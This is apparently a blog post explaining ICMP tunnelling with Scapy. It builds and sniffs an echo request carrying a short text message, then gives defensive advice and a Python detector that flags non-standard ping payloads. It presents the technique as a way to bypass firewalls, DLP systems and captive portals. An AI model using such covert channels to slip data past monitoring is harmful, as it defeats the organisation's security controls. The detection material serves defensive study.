How to send text message by ICMP tunnel by SCAPY

Levko Kravchuk
3 min read, Apr 21, 2024


DISCLAIMER: Please use this article for study purposes only. I provide this information for Administrators who want to be more effective in their job.

Folks, I want to share with you an amazing technology: ICMP tunnels. They were developed to bypass firewalls and DLP systems, and the main reason for their development is to get free Wi-Fi through captive portals. To try it, you need two PCs and Python 3. In my case, I used a Python virtual environment (venv). Install Scapy with pip on both hosts. Then start the Scapy interactive shell and run the following commands on the sender side:

packet = IP(dst="X.X.X.X")/ICMP()/"Hi there"

Here X.X.X.X is the destination IPv4 address and "Hi there" can be any text. Once the packet is built, you send it with the command send(packet).

Of course, it does not work if you cannot sniff the packet on the other side. To do that, capture incoming traffic with the Scapy method sniff(lfilter=lambda pkt: ICMP in pkt), which checks each IP packet and keeps only those that carry ICMP. In my case (a virtual laboratory) I sniffed on all interfaces, which means I did not specify one in the command, and afterwards ran a=_ to keep the result. However, you may pass arguments to sniff() to specify the interface and filter, for example sniff(iface="en1", filter="icmp", count=12). The a=_ assignment stores the output of the sniff() call in the variable a: in the Python interactive shell the underscore (_) temporarily holds the result of the last expression evaluated. An additional method, a.nsummary(), lists the captured packets.

After that, you can view a single packet by picking an element from the captured list, for example a[1].

>>> a[1]

<Ether dst=60:45:bd:ab:cd:ef src=ab:34:56:cd:ef:fe type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=36 id=1 flags= frag=0 ttl=48 proto=icmp chksum=0x3b5c src=172.103.X.X dst=10.0.0.4 |<ICMP type=echo-request code=0 chksum=0xb457 id=0x0 seq=0x0 unused='' |<Raw load='Hi there' |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>>

I like Scapy because it is a powerful tool for crafting IP packets, ICMP messages and TCP segments. That is exactly why an attacker can use it to bypass DLP systems.

How to protect against this? Use SIEM tools like Splunk, or Wireshark, IDS/IPS such as Sonar or Suricata, machine-learning IDS/IPS, or a traffic analyzer. I prepared some screenshots for you where I had highlighted the crafted ICMP packets. Those contain the maximum payload size that I sent. Please note the 'no response found!' entries: they mean the remote host did not respond. For a network or system administrator, that should surely be a flag to start investigating immediately.
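As an added example (not the author's code), here is a pure-Python detector in the spirit of the lfilter check above, written for the defender: it parses raw IPv4 echo requests, verifies the ICMP checksum, and flags payloads that match neither the Linux nor the Windows default ping pattern but carry readable text or exceed 64 bytes. The packet builder and the sample packets are constructed for the demo, and the "known good" templates assume unmodified ping tools.

```python
import string
import struct

# Default echo payloads used as "known good" templates (assumption: unmodified ping tools).
# iputils ping sends an 8-byte timestamp followed by the bytes 0x10, 0x11, ... 0x3F;
# Windows ping sends this fixed 32-byte alphabet string.
LINUX_PATTERN = bytes(range(0x10, 0x40))
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwxyzabcdef"
PRINTABLE = set(string.printable.encode())


def inet_checksum(data):
    """RFC 1071 one's-complement checksum (IPv4 header and ICMP use the same one)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src, dst, payload):
    """Constructed IPv4/ICMP echo request: the wire form of IP(dst=...)/ICMP()/payload."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0, 0) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    addr = lambda a: bytes(int(x) for x in a.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 1, 0, 64, 1, 0, addr(src), addr(dst))
    return ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:] + icmp


def inspect_echo(raw):
    """Verdict dict for an IPv4 echo request (what lfilter=lambda pkt: ICMP in pkt selects); else None."""
    ihl = (raw[0] & 0x0F) * 4
    if raw[9] != 1 or raw[ihl] != 8:          # protocol 1 = ICMP, type 8 = echo request
        return None
    icmp = raw[ihl:]
    payload = icmp[8:]
    known = (len(payload) >= 16 and payload[8:] == LINUX_PATTERN[:len(payload) - 8]
             or payload == WINDOWS_PATTERN)
    printable = sum(b in PRINTABLE for b in payload) / max(len(payload), 1)
    return {
        "payload_len": len(payload),
        "checksum_ok": inet_checksum(icmp) == 0,
        "known_ping": known,
        # Readable text or an oversized payload in a non-standard echo is what the tunnel looks like.
        "suspicious": not known and (printable > 0.9 or len(payload) > 64),
    }


# Constructed samples, not captures from the article: a stock Linux ping and the article's message.
PING = build_echo_request("10.0.0.9", "10.0.0.4", struct.pack("!II", 1713700000, 123456) + LINUX_PATTERN)
TUNNEL = build_echo_request("10.0.0.9", "10.0.0.4", b"Hi there")
```

Feed inspect_echo() the raw bytes of each captured IP packet (for example bytes(pkt[IP]) from Scapy) and alert on the records where "suspicious" is set; the TUNNEL sample comes out at 36 bytes, the same len=36 the article's capture shows.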

Written by Levko Kravchuk

I'm Levko Kravchuk, a System and Network Administrator with 15 years in IT and a DevOps mindset. Skilled in Linux, automation, and an active volunteer in BSIDES